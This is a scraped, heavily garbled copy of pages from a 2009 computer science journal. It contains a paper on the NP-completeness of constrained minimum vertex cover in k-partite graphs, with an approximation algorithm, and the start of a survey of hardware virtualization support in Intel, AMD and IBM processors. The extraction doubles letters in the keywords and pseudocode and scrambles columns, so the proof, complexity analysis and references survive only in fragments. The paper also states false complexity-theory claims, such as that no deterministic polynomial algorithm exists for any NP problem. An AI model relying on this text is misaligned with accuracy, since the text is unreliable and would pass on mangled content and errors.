from the Department of Electrical Engineering at BirZeit University in
BirZeit in West Bank in August 1984.Dr. Mikki got a graduate research assistantship from NPAC (North East
Parallel Architecture Center) at Syracuse University in Syracuse in New
York (USA) during the year of 1989-1990. He also got a Research
Assistantship from the Department of Electrical and Computer Engineering at
Syracuse University in Syracuse, in New York (USA) during the period of
1990-1994. He also received a Deanery of Scientific Research grants fromIUG during the academic years of 01/02, 03/04, and 07-08. Dr. Mikki was a
software consultant and programmer at Vertechs Software Solutions Inc in
Syracuse in New York (USA) during the period from 1991 to 1994. He wasalso a software consultant at Computer Software Modeling and Analysis in
Fayetteville in New York (USA) from January 1993 to March 1993.
Dr. Mikki got two funded projects from the European Union (EU):Mediterranean Virtual University (MVU) project from 2004 to 2006 and
Open Distance Inter-university Synergies between Europe, Africa and MiddleEast (ODISEAME) project from 2002 to 2005.Research Interests of Dr. Mikki include High Performance Parallel and
Distributed Computing, Grid and Cluster Computing, Wireless and Mobile
Networks, Modeling and Design of Digital Computer Systems, InternetTechnology and Programming, Internet Performance Measurement Tools and
Web-Based Learning
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 73/215
Constraint Minimum Vertex Cover in K -Partite Graph:
Approximation Algorithm and Complexity Analysis
Kamanashis BiswasComputer Science and Engineering Department
Daffodil International University102, Shukrabad, Dhaka-1207
ananda@daffodilvarsity.edu.bd
S.A.M. HarunRight Brain Solution
Flat# B4, House# 45, Road# 27Banani, Dhaka
harun@rightbrainsolution.com
Abstract – Generally, a graph G, an independent set is a subset S
of vertices in G such that no two vertices in S are adjacent
(connected by an edge) and a vertex cover is a subset S of vertices
such that each edge of G has at least one of its endpoints in S.
Again, the minimum vertex cover problem is to find a vertex cover
with the smallest number of vertices. Consider a k-partite graph
G = (V , E) with vertex k-partition V = P1 ∪ P2 . . . ∪ P k and the k
integers are k p1, k p2, . . . , k pk. And, we want to find out whether
there is a minimum vertex cover in G with at most k p1
vertices in
P1 and k p2 vertices in P2 and so on or not. This study shows that
the constrained minimum vertex cover problem in k-partite graph
(MIN-CVCK) is NP-Complete which is an important property of
k-partite graph. Many combinatorial problems on general graphs
are NP-complete, but when restricted to k-partite graph with at
most k vertices then many of these problems can be solved in
polynomial time. This paper also illustrates an approximation
algorithm for MIN-CVCK and analyzes its complexity. In future
work section, we specified a number of dimensions which may be
interesting for the researchers such as developing algorithm for
maximum matching and polynomial algorithm for constructing
k-partite graph from general graph.
Keywords: B Bii p paar r t t iit t ee ggr r aa p phh , , C C lliiqquuee p pr r oobblleemm , , C C oonnsst t r r aaiinnt t mmiinniimmuumm
vveer r t t ee x x ccoovveer r , , N N PP--C C oomm p plleet t ee , , PPooll y ynnoommiiaall t t iimmee aallggoor r iit t hhmm
I. INTRODUCTION
NP-Completeness theory is one of the most importantdevelopments of algorithm research since its introduction inthe early 1970. Its importance arises from the fact that theresults have meaning for all researchers who are developingcomputer algorithms, not only computer scientist but also forthe electrical engineers, operation researchers etc. A widevariety of common encountered problems from mathematics,computer science and operations research are known to be NP-Complete and the collection of such problems is continuously
rising almost everyday. Indeed, the NP-Complete problemsare now so pervasive that it is important for anyoneconcentrated with the computational aspect of these fields tobe familiar with the meaning and implementations of thisconcept. A number of works have already been done as well asgoing today. For example, Jianer Chen et al. have shown thatthe complexity of an algorithm for solving vertex coverproblem is non deterministic polynomial [3]. Again, thecomplexity of algorithm of constrained minimum vertex coverin bipartite graph is also non deterministic polynomial which
is proved by Jianer Chen & Iyad A. Kanj [2]. Similarly, H.Fernan & R. Niedermeier has proposed an efficient exactalgorithm for constrained bipartite vertex cover is also nondeterministic polynomial [4]. This paper shows that theminimum vertex cover in k -partite graph is NP-Complete,provides an approximation algorithm and analyzes itscomplexity which is polynomial time algorithm.
II. PRELIMINARY
This section presents some basic terms and necessaryelaborations which are important to go though the rest of thepaper. Definitions that are not included in this section will beintroduced as they are needed.
A. Bipartite Graph
A bipartite graph is any graph whose vertices can bedivided into two sets, such that there are no edges betweenvertices of the same set [8]. A graph can be proved bipartite if there does not exist any circuits of odd length. A set of
vertices decomposed into two disjoint sets such that no twovertices within the same set are adjacent. A bigraph is aspecial case of a k -partite graph with k k == 22 .
Figure 2.1: Bipartite Graph
B. K-partite Graph
A k - partite Graph (i.e., a set of vertices decomposed into k disjoint sets such that no two vertices within the same set areadjacent) such that every pair of vertices in the k sets areadjacent [9]. If there are p, q, . . . , r vertices in the k sets, thecomplete k -partite graph is denoted k p,q, . . ., r .
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550067
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 74/215
(a) (b)
Figure 2.2: (a) k-partite graph, (b) Complete k-partite graph
C. Vertex Cover
Let S be a collection of subsets of a finite set X . Thesmallest subset Y of X that meets every member of S is calledthe vertex cover , or hitting set. However, some authors callany such set a vertex cover, and then refer to the minimum
vertex cover [6]. Finding the hitting set is an NP-Completeproblem. Vertex covers, indicated with no fill vertices, areshown in the figure 2.3 for a number of graphs. In a completek -partite graph, vertex cover contains vertices from at least K K --
11 stages.
Figure 2.3: Vertex Cover
1. Minimum Vertex Cover: As a detailed example of an NP-Complete problem in Section III, we have described theVERTEXCOVER problem. Given a graph G = (V , E ), is therea vertex cover, i. e., a subset of nodes, that touches all edges in E and contains not more than k vertices, where k is a givenconstant? Posed as a language, this problem becomes-
VERTEX-COVER = {(G, K ) | G has vertex cover of at
most k vertices.}
Typically, this problem can be asked in another form: Insteadof asking whether some vertex cover exists, the task is to find
the smallest possible vertex cover: Given a graph G = (V , E ),find a vertex cover of G having the smallest possible numberof vertices. Typically, optimization problems like this one areeven more difficult to decide than the related yes/no problems:VERTEXCOVER is NP-Complete, but MIN-VERTEX-COVER is NP-hard, i. e., it is not even in NP itself.
2. Approximate Vertex Cover: We know that finding theminimum vertex cover of a graph is NP-Complete. However, avery few simple procedures can efficiently find a vertex cover
that at most twice as large as the optimal cover. Let us see asimple procedure [6].
VertexCover (G = (V , E ))
While ( E ≠∅) do:
Select an arbitrary edge (u, v) ≤ E
Add both u and v to the vertex coverDelete all edges from E that are
incident on either u or v.3. Constraint Vertex Cover: The constrained vertex cover
of an undirected graph G = (V , E ) is a subset V ' ⊆ V where thenumber of vertex is less than or equal to k [here k is k p1 + k p2
+ . . . + k pk ]. That is, V ' ≤ k . We have to decide whether there isa minimum vertex cover in G with at most k p1 vertices in P1 part and k p2 vertices in P2 and so on.
D. Class P and NP
The class P is the type of problems that can be solved bypolynomial time algorithm. For the problem of class P,polynomial time algorithm already exists. For example matrix
multiplication algorithm, Prim’s minimum spanning treealgorithm, graph traversal algorithm etc. are polynomial timealgorithm. On the other hand, the name NP stands fornondeterministic polynomial. The class NP is the set of problems that can be solved by nondeterministic algorithm inpolynomial time or the set of problems whose solution can beverified by a polynomial time algorithm [5]. No deterministicpolynomial time algorithm exists for the problems of NP class.
E. Properties of NP-Complete Problem
Let L1 and L2 be two problems. L1 reduces to L2 (also
written L1≤ p L2) if and only if there is a way to solve L1 by a
deterministic polynomial time using a deterministic algorithmthat solves L2 in polynomial time [7]. We can now define theset of NP-Complete problems, which are the hardest problemsin NP in the following ways. A problem L is NP-Complete if-
1. L ∈ NP, and
2. L1 ≤ p L for L1 ∈ NPC.
That is, more precisely we can say a problem in NP-Completeif and only if-
1. The problem is in NP and2. The problem is polynomial reducible from anotherproblem that is already in NP-Complete.
If a problem L satisfies property 2, but not necessarilyproperty 1, then we say that L is NP-hard.
III. VERTEX COVER AND CLIQUE PROBLEM
The vertex cover of an undirected graph G = (V , E ) is a
subset V ' ⊆ V such that if (u, v) ∈ E , then u ∈ V ' or v ∈ V ' (orboth). More precisely, it is the optimization problem of findinga vertex cover of minimum size in a graph that is finding aminimum number of vertices that “covers” all edges. Thefollowing figure illustrates minimum vertex cover of the graphG.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550068
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 75/215
Instance <G, k> of CLIQUE
raph
ere, the above gr . Suppose that G
uced form 4-partite graph
Figure 4.4: 3-partite graph
Figure 3.1: Minimum vertex cover of graph G with size V '
A clique in an undirected graph G = (V , E ) is a subset V ' ⊆ V of vertices, each pair of which is connected by an edge in E .Similar to vertex cover problem, the clique problem is also theoptimization problem of finding a clique of maximum size in agraph. The practical usage of clique problem is in synthesisand optimization of digital systems to model certain resourceallocation constraints etc.
Figure 3.2: Clique Problem
IV. MAIN THEOREM
It is already proved that the MIN-CVCB (Constrainedminimum vertex cover in bipartite graph) problem is in NP.Jianer Chen and Iyad A. Kanj have proved the theorem in“Constrained minimum vertex cover in bipartite graphs:
complexity and parameterized algorithms” in 2003 [2]. G. Baiand H. Fernau show that exact algorithms could perform muchbetter than theoretical assumption [1]. In this section, the maintheorem of this research is described which shows that vertexcover in k -partite graph is NP-Complete.
Theorem: The minimum constrained vertex cover problem is NP-Complete in k-partite graph.
Proof: We show that VERTEX-COVER ∈ NP. Suppose, we
are given a graph G = (V , E ) with vertex k -partition V = P1 ∪
P2 . . . ∪ Pk and the integers k p1, k p2, . . ., k pk where k = k p1 + k p2
+ - - - + k pk . The certificate we choose if the vertex cover V ' ⊆ V itself. The verification algorithm affirms that |V ' | = k , and
then it checks, for each edge (u, v) ∈ E , whether u ∈ V ' or v
∈ V ' . This verification can be performed straightforwardly inpolynomial time.
We can prove that the Vertex-cover problem is NP-hard by
showing that CLIQUE ≤ p VERTEX-COVER. This reductionis based on the notion of the “complement” of a graph. Givenan k -partite graph G = (V , E ), the complement of G is defined
as G = (V , E ) where E = {(u, v) : (u, v) ∉ E }. In other words, G is the graph containing exactly those edges that are not in G.
The figure 4.1 shows a graph and its complement and
illustrates the reduction from CLIQUE to VERTEX-COVER. Each edge is
“covered” by at
least one vertex
in V ' incident
on it.
Vertex cover
V ' of size 2
V ' ={ z, w}
Figure 4.1: 3 Easy reductions
The reduction algorithm takes as input an instance (G, k ) of the clique problem. It computes the complement G, which iseasily double in polynomial time. The output of the reductionalgorithm is the instance (G, |V | – K ) of the vertex-coverproblem. To complete the proof, we show that thistransformation is indeed a reduction: the k -partite graph has aclique of size k if and only if the graph G has a vertex cover of size |V | – k as shown in the figure 4.1.
Figure 4.2: 4-partite g
H aph G is a 4-partite graph
has a clique V ' ⊆ V with size k = |V ' |. The subsets produced inthe previous graph are as follows:
Figure 4.3: Subsets of graphs prod
Instanc G, |V | - k > of VERTEX-COVERe <
Clique of
maximum size
represented by
rectangular area
~G
V ' is CLIQUE of size
k (= 5 here) in ~G
G
V ' is an is of size k (= 5 here) in G
G
V ' is a VC of size n-k (= 4 here) in G
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550069
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 76/215
So V – V ' is the v k .
et (a, b) be any edge in E , then (a, b) ∉ E , which implies that
onversely, suppose that G has a vertex cover V ' ⊆ V , where
V. APPROXIMATION ALGORITHM
At p ompletepro
Approximation: An algorithm which quickly finds a
rithm which probably yields
f
•
App imation algorithms return solutions with a guarantee
. Algorithm for MIN-CVCK problem
oposed algorithm formin
roposed algorithm for CVCK problemertex cover in G with size |V | –
Lat least one of a or b does not belong to V ' . Since every pair of vertices in V ' is connected by an edge of E . Equivalently, atleast one of a or b is in V – V ' , which means that the edge (a,b) is covered by V – V ' . Since (a, b) was chosen arbitrarilyfrom E , every edge of E is covered by a vertex in V – V ' . Hence
the set V – V ' has size |V | – k , from a vertex cover for G.
C
|V ' | = |V | – k , then for all a, b ∈ V , if (a, b) ∈ E then a ∈ V ' or b
∈ V ' or both. If a ∈ V ' and b ∉ V ' then (a, b) ∈ E , V – V ' is in aclique and it has size |V | – |V ' | = k .
resent, all known algorithms for NP-Cblems require time which is exponential. It is unknown
whether there are any faster algorithms. Therefore, in order tosolve an NP-Complete problem for any non-trivial problem
size, one of the following approaches is used according to [6]:
•
suboptimal solution which is within a certain(known) range of the optimal one. Not all NP-Complete problems have good approximationalgorithms, and for some problems finding a goodapproximation algorithm is enough to solve theproblem itself.
Probabilistic: An algo•
good average runtime behavior for a givendistribution of the problem instances—ideally, onethat assigns low probability to "hard" inputs.
Special cases: An algorithm which is probably fast i•
the problem instances belong to a certain special case.
Heuristic: An algorithm which works "reasonablywell" on many cases, but for which there is no proof that it is always fast.
roxattached, namely that the optimal solution can never be muchbetter than this given solution. Thus we can never go too farwrong in using an approximation algorithm. No matter whatour input instance is and how lucky we are, we are doomed todo all right. Further, approximation algorithms realizingprovably good bounds often are conceptually simple, very fast,
and easy to program.
A
In this section, we described our primum constrained vertex cover in k -partite graph. It is an
approximation algorithm for MIN-CVCK problem. Theprocedure is described in the next column.
P
)
is size of n tition
from the
cedure MIN-CVCK (n, G, U, [Count], K Pro
n is the number of partition, n ≥2[ // // G is a given Graph
in each partition which // U is the list of vertex // Count is an array contains how many vertices in each par // K is the array which indicates we can take at most K [i] verticesi-th partition]
nIIntteeggeerr aa[[]],, bb[[]],, ppaarrtt[[]],, ttmmppUU[[]] SSttrruucctt EEddggeeLLiisstt[[]]
which track whether a vertex is selected or not
ntains how many vertices are already used
ith 0es the partition in which a vertex lies
a is a flag array[ // selected or not used
// a is initialized with not used // b is an integer array which coby each partition.
// b is initialized w // part is an array indicat // EdgeList is an array of structure containing edge]
'GG' == GG // Compute part array from U
hwwhiillee ((TTrruuee)) {{
ttmmppUU == EExxttrraacctt__mmaaxx ((GG'')) maximum degree (≥1) u ∈ G[v] // find a vertex u from G' with
IIf f ttmmppUU == NNUULLLL TThheenn BBrreeaak k EEllssee IIf f bb[[ ppaarrtt [[ ttmmppUU ]] ]] ++ 11 >> K K [[ ppaarrtt [[ ttmmppUU ]] ]]
// here part[tmpU] is the partition where tmpU lies
aa[[ttmmppUU]] == nnoott sseelleecctteedd EEllssee aa[[ttmmppUU]] == sseelleecctteedd bb[[ ppaarrtt [[ ttmmppUU ]] ]] == bb[[ ppaarrtt [[ttmmppUU ]] ]] ++ 11 EEddggeeLLiisstt == NNUULLLL rreemmoovvee aallll tthhee ccooiinncciiddeenntt eeddggee oof f ttmmppUU f f rroomm GG'' aanndd aadddd tthhoossee eeddggeess ttoo EEddggeeLLiisstt IIf f MMaak k ee__ddeecciissiioonn ((GG' )) == FFaallssee aa[[ttmmppUU]] == nnoott sseelleecctteedd bb [[ ppaarrtt [[ ttmmppUU ]] ]] == bb [[ ppaarrtt [[ ttmmppUU ]] ]] -- 11 aadddd tthhee eeddggeess iinn EEddggeeLLiisstt ttoo GG' EEnndd IIf f
}} Whilee_MIN-CVCK
rocedure node_type Extract _max (G)
// End_ // End_Procedur
P{MMaaxx == 00,, MMaaxxDDeeggVVeerrtteexx == NNUULLLL f f oorr eeaacchh vveerrtteexx iinn V V [[GG]] iif f aa[[uu]] == nnoott uusseedd aanndd ddeeggrreeee[[uu]] >> MMaaxx TThheenn MMaaxxDDeeggVVeerrtteexx == uu MMaaxx == ddeeggrreeee[[uu]] rreettuurrnn MMaaxxDDeeggVVeerrtteexx
ract_max
rocedure boolean Make_decision(G)
} // End_ procedure_Ext
P{SSeett SS == NNUULLLL // S is a set of vertices
oFForr ii ==11 ttoo NNuummbbeerr oof f ppaarrttiittiioonn iinn GG
eSSelleecctt nnoonnee oorr [[11,, k k [[PP [[ oorrdd [[ ii ]] ]] ]] –– bb [[ PP [[ oorrdd [[ ii ]] ]] ]] ]] vveerrttiicceess wwhhiicchh aarree nnoott uusseedd f f rroomm ii--tthh ppaarrttiittiioonn aanndd aadddd ttoo SS wwhheerree eevveerryy vveerrtteexx ccooiinncciiddeenntt oonn aatt lleeaasstt oonnee nnoonn--vviissiitteedd eeddggee aanndd mmoorree nnoonn--vviissiitteedd eeddggeess tthhaann tthhoossee aarree nnoott sseelleecctteedd.. MMaarrk k aallll eeddggeess aass vviissiitteedd ccoonncceerrnneedd wwiitthh sseelleecctteedd vveerrtteexx..
[ // ord is an array containi tion number such that k [ P[ord[ i ] ] ] –
b[ P[ord[ i ] ] ] ≥ k [ P [ ord [ i +1 ] ] ] – b [ P [ ord [ i + 1 ] ] ] for all i <k ]
ng parti
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550070
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 77/215
IIf f tthheerree eexxiisstt aatt lleeaasstt oonnee eeddggee iinn GG nnoott ccooiinncciiddeenntt oonn vveerrtteexx uu ∈∈ SS tthheenn rreettuurrnn FFaallssee EEnndd If If RReettuurrnn TTrruuee
ion
Here we will define the complexity of our proposed CVCK
graph G (V , E ) with k partition
n + ( n – 1 ) + ( n – 1 ) + k + k (n – 1 ) }
n –1)2
Co
y we get from equation (i),
( n – 1) ( 2 + logn)2
omplexWhen
we get from equation (i),( n – 1 ) (2 + logn)
3 2
ence, w ity for the aboveVCK a m is O(n2). The following table
Domaince
VI. CONCLUSION
computer sc ieves that the NP pletep . The re if any single pletepr in polynomial time, then every NP-completeproblem has a polynomial-time algorithm. In this research, we showthat the minimum ver aph is NP-complete.The
A. Futu
I tmatchingeasie to solve this type of NP-Complete problem. Is it possible toprove vertex cover in k -partite graph with node capacity (i.e. each
costs) is NP-Complete? Is there any polynomial
alg
g Fernau,
Frontiers in Algorithmics, Springer, ISSN- 1611-3349, p67-68, 2008.
] Jianer Chen and Iya nimum Vertex Covering
bipartite graphs: co algorithms, Journal of
[3]
[4]
mputer Science
[5]
ompleteness, W. H. Freman Co., New York, 1979
,
[8] h
http://m am.com/, Last Checked: 30-07-2009
Biswas, born in 1982, post graduated7.
in Daffodil
} // End_Procedure_Make_decis
B. Complexity Analysis
algorithm. Let us given awhere |V | = n.
Now we get the complexity for average case,
( n – 1) { log
=> ( n – 1 ) logn + 2 ( n –1 )2 + ( n – 1) k + k (
=> ( n – 1 )2 ( 2 + k ) + ( n – 1 ) ( k + logn) . . . . . . . . (i)
mplexity for best case-When k = 2
then the complexit1 )( n – 2 ( 2 + 2) +
=> 4 ( n –1 ) + ( n – 1 ) log(n + 4)2=> O ( n ) + O ( nlogn )2=> O ( n )
case-C ity for worstk = n
then the complexity1)( n –
2( 2 + n ) +
=> O ( n ) + O ( n ) + O ( nlogn )O
3=> ( n )
H e have showepproximation algorith
d that the time complexCsummarizes some known results of vertex cover problems.
Table 5.1: Complexity of some vertex cover problems
ProblemTime Referen
V rO(kn 52k )
Iyad A. Kanj [3]
ertex CoveProblem
+ 1.28Jianer Chen,Weijia Jia &
Constrainedminimum vertexcover in bipartite
O(1.26ku+kl) + (k u+k l) |G| ) Iyad A. Kanj [2]
graph
Jianer Chen &
An efficient exact
Most theoreticalroblems are intractableoblem can be solved
ientist belason is that
-comNP-com
tex covering for k -partite grre are some limitations as our approximation algorithm is
efficient for 80% graph. These are: i) if the graph can be drawn as atree then our algorithm will give minimum + 1 solution for it, ii) there
may be no solution or output for a very complex graph. Now, some of the open problems are as follows:
1. What is the complexity of constrained minimum vertexcover in k -partite graph?
2. Is it possible to minimize the complexity of approximationalgorithm of this problem into O(nlogn) or less from O(n2)
?
re Work
s i possible to develop a perfect algorithm for maximumin k -partite graph? If it becomes possible then it will be
r
node has its own
orithm for construct k -partite graph from general graph?
VII. REFERENCES
[1] G. Bai, H. Fernau, “Constraint Bipartite Vertex Cover: Simpler Exact
Algorithm and Implementations”, by Gouqiang Bai, Hennin
[2 d A. Kanj, Constrained Mi
mplexity and parameterized
Computer and System Sciences, 67(2003), pp. 833-847
Jianer Chen, Iyad A. Kanj and Weijia Jia, Vertex Cover: Further
Observations and Further Improvements1, Journal of Algorithms 41
(2001), pp. 280-301
H. Fernan and R. Niedermeier, An efficient exact algorithm for
constrained bipartite vertex cover , Lecture Notes in Co1672 (MFCS’99), (1999) pp. 387-397
M. R. Garley, and D. S. Johnson, Computers and Intractability : A Guide
to the Theory of NP-C
[6] Steven S. Skiena, “The Algorithm Design Manual”, Springer
Science+Business Media, ISBN: 978-1-84800-070-4, 2nd Edition,
pp.156- 157, 218.
[7] Lu Xuemiao, “On the complexity of induction of structural descriptions”,
Journal of Computer Science and Technology, Vol. 2, ISSN:1860-4749
Springer, September 2008.
ttp://knowledgerush.com/kr/encyclopedia/, Last Checked: 30-07-2009
athworld.wolfr[9]
Kamanashisalgorithm forconstrained O(1.40k + kn)
H. Fernan & R.Niedermeier [4]
bipartite vertexcover
Constrained
from Blekinge Institute of Technology, Sweden in 200ng.His field of specialization is on Security Engineeri
At present, he is working as a LecturerInternational University, Dhaka, Bangladesh.
S.A.M. Harun, is graduated from International IslamicUniversity Chittagong. He is a programmer and ACMproblem setter. Now he is working as a project managerin a software company. His major area of interest iseveloping efficient algorithm.
minimum vertexcover in k -partite
graph
O(n2) Ours
d
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550071
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 78/215
HARDWARE VIRTUALIZATION SUPPORT IN
INTEL, AMD AND IBM POWER PROCESSORS
Kamanashis Biswas
Computer Science and Engineering DepartmentDaffodil International University
102, Shukrabad, Dhaka-1207, Bangladeshananda@daffodilvarsity.edu.bd
Md. Ashraful Islam
Department of Business AdministrationBangladesh Islami University
Gazaria Tower, 89/12, R. K. Mission Road, Dhaka-1203ashraful47@yahoo.com
ABSTRACT – At present, the mostly used and developed mechanism is hardware virtualization which provides a common platform to run multiple operating systems and applications inindependent partitions. More precisely, it is all about resourcevirtualization as the term ‘hardware virtualization’ is emphasized.
In this paper, the aim is to find out the advantages and limitations of current virtualization techniques, analyze their cost and performance and also depict which forthcoming hardware
virtualization techniques will able to provide efficient solutions for multiprocessor operating systems. This is done by making a methodical literature survey and statistical analysis of the benchmark reports provided by SPEC (Standard Performance Evaluation Corporation) and TPC (Transaction processing Performance Council). Finally, this paper presents the current aspects of hardware virtualization which will help the IT managers of the large organizations to take effective decision while choosing server with virtualization support. Again, the future works described in section 4 of this paper focuses on some real-world challenges such as abstraction of multiple servers, language level virtualization, pre-virtualization etc. which may be point of greatinterest for the researchers.
Keywords: H H aar r d d wwaar r ee V V iir r t t uuaallii z zaat t iioonn , , PPaar r aavviir r t t uuaallii z zaat t iioonn , , V V iir r t t uuaall
M M aacchhiinnee M M oonniit t oor r , , H H y y p peer r vviissoor r , , B Biinnaar r y y T T r r aannssllaat t iioonn , , X X eenn , , D Deennaallii..
1. INTRODUCTION
A current trend in the computer industry is replacinguniprocessor computers with small multiprocessors [11].Traditionally, most small multiprocessors have been SMPs(Symmetric Multiprocessors) with two or more processorchips where each processor has equal access to memory andhardware devices. But now, the scenario is going to bechanged and the manufacturers are trying to increase PCmanageability, user productivity and so on. Manytechniques are already working to support multiprocessoroperating systems such as giant lock ing, asymmetric
approaches, virtualization, K42 etc.There are two approaches which are used for
parallelized processors. First, Symmetric multithreading(SMT) [3] where two or more concurrently running programthreads share processor resources, e.g. Intel Pentium 4 andXenon processor [12], and the 2-way multithreaded Sony/IBMCell processor . Second one is chip multiprocessors (CMPs)[5], which partitions the chip area into two or more mostlyindependent processor cores, e.g. IBM POWER4architecture was released as a dual-core chip in 2001 [8].
However, to implement multiprocessor operating systemsand providing dynamic environment many technologies areevolved. But the most common and continuously updatedtechnology is virtualization as all the companies like Intel,AMD, IBM always keep focus on this area by developingnew and new virtualization techniques. Generally,virtualization is the faithful reproduction of an entire
architecture in software which provides the illusion of a realmachine to all software running above it [10]. Precisely,virtualization is a framework or methodology of dividing theresources of a computer into multiple executionenvironments, by applying one or more concepts ortechnologies such as hardware and software partitioning,time-sharing, partial or complete machine simulation,emulation, quality of service, and many others. This can beapplied by either software or hardware or both and also forDesktop computer as well as for the Server machine.
In software-only virtualization technique, a VirtualMachine Monitor (VMM) program is used to distributeresources to the current multiple threads. But this software-only virtualization solution has some limitations. One is
allocation of memory space by guest operating systemswhere applications would conventionally run. Anotherproblem is binary translation, i.e. the necessity of extra layerof communication for binary translation, in order to emulatethe hardware environment by providing interfaces tophysical resources such as processors, memory, storage,graphics cards, and network adapters [16]. So hardwarevirtualization technique is a good solution to face the aboveproblems which works in cooperation with VMM. Thisvirtualization technique provides a new architecture uponwhich the operating system can run directly, it removesthe need for binary translation. Thus, increased performanceand supportability ensured. It also enhances the reliability,supportability, security, and flexibility of virtualization
solutions. So the keen interest is on hardware virtualization.This paper focuses on the virtualization supports of
current microprocessors and makes a comparison amongvarious hardware virtualization techniques offered byvarious companies. As there are many companies in themarket competing with their latest technologies and improvedfacilities so it is important to have a good understandingabout the mechanisms they are using. However, hardwarevirtualization is raising its acceptability over othervirtualization techniques as it provides transparency, legacy
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550072
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 79/215
support, simplicity, monitoring facility and security whichis the point of interest for industrial computing systems.
II. DIFFERENT VIRTUALIZATION TECHNIQUES
In uniprocessor system, it often assumes only oneprocess in the kernel. As a result, it simplifies the kernelinstructions and cross-process lock is not required. But the
scenario is changed when multiple processors execute in thekernel. That means adding SMP support changes theoriginal operating system. Hence mechanisms forsupporting multiprocessors operating systems are required.There are different ways of organizing a multiprocessoroperating system such as giant locking, coarse-grainedlocking, fine-grained locking, asymmetric approaches,virtualization and API/ABI compatibility andreimplementation. But the virtualization technique is theimportant one as the developers are continuously upgradingthis technology. At first, we describe software-onlyvirtualization and hardware virtualization. Thenparavirtualization and full virtualization is explained.
A. SOFTWARE ONLY VIRTUALIZATION
In software-only virtualization technique, the concept of 2-bit privilege level is used: using 0 for most privilegedsoftware and 3 for least privileged those. In this architecture(IA-32 and Itanium), the guest operating systems eachcommunicates with the hardware through the VirtualMachine Monitor (VMM) which must decide that access forall virtual machines on the system. Thus, the virtual machinecan be run on non-privileged mode i.e. non-privilegedinstructions can be executed directly without involving theVMM. But there are some problems that arise in software-only solution. Firstly, ring aliasing- problems that arisewhen software is run at a privilege level other than thelevel for which it was written. Secondly, address-spacecompression- occurs when guest software tries to access theVMM’s guest’s virtual address space. Thirdly, impacts onguest transitions- may cause a transition to the VMM and notto the guest operating system. VMMs also face othertechnical challenges such as use of private memory forVMM use only, use of VMM interrupt handling, hiddenstate access etc. [16].
B. HARDWARE VIRTUALIZATION
Hardware virtualization allows the VMM to run virtualmachines in an isolated and protected environment. It is also
transparent to the software running in the virtual machine,which thinks that it is in exclusive control of the hardware.In 1999, VMware introduced the hosted VMM, and it wascapable of extending a modern operating system to supporta virtual machine that acts and runs like the hardware levelVMM of old [14]. To address the problems of softwareonly virtualization solution, hardware virtualizationmechanism is applied which is possibly the most commonlyknown technology, including products from VMware andMicrosoft’s Virtual Server. Now, VMMs could run off-the-
shelf operating systems and applications without recourse tobinary translation or paravirtualization. This capabilitygreatly facilitates the deployment of VMMs and providesgreater reliability and manageability of guest operatingsystems and applications.
C. PARAVIRTUALIZATION
Basically, to overcome the virtualization challengesof software-only virtualization, the VMM was developedby the designers that modify guest software (source orbinary). Denali and Xen are examples of VMMs that usesource level modifications in a technique calledparavirtualization. Paravirtualization is similar tohardware emulation because in concept it is designed tosupport multiple OSs. The only implementation of thistechnology today is the Xen open source project, soon tobe followed by an actual product from XenSource.Paravirtualization provides high performance andeliminates the ‘changes to guest applications’. But thedisadvantage is that it supports limited numbers of operating systems. For example, Xen cannot support an
operating system that its developers have not modified, suchas Microsoft Windows.
D. FULL VIRTUALIZATION
Full system virtualization provides a virtual replica of thesystem’s hardware so that operating systems and softwaremay run on the virtual hardware exactly as they would onthe original hardware [13]. The first introduced software forfull virtualization system was CP-67, designed as a specializedtime-sharing system which exposed to each user acomplete virtual System/360 computer. Though fullvirtualization on PC architectures is extremely complex, atpresent it is pioneered in the market since 1998 as VMware
initiated x86 based virtualization providing the fundamentaltechnology for all leading x86-based hardware suppliers. Itcreates a uniform hardware image that implemented throughsoftware on which both operating system and applicationprograms can run.
III. HARDWARE VIRTUALIZATION SUPPORT INMICROPROCESSORS
The challenges imposed on IT business that the CIOsand IT managers always face are cost-effective utilizationof IT infrastructure and flexibility in adapting toorganizational changes. Hence, virtualization is a
fundamental technological innovation that provides theskilled IT professionals to organize creative solutions tothose business challenges. The leading companies of ITsector are also introducing their innovative and well-developed approaches every day to cope with demands of the age. Again the hardware virtualization support is animportant factor for the field of Grid Computing or secureon-Demand Cluster computing. The hardware support forvirtualization in current microprocessors is addressed in thissection.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550073
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 80/215
A. INTEL HARDWARE SUPPORT
Intel is developing microprocessors with variousadvanced virtualization supports. They are updating theirtechnologies constantly to facilitate the users’ demands.Starting with Server and mainframe systems virtualization,now Intel is providing hardware support for processorvirtualization through virtual machine monitor softwarewhich is also known as hypervisor. The actual aim of using
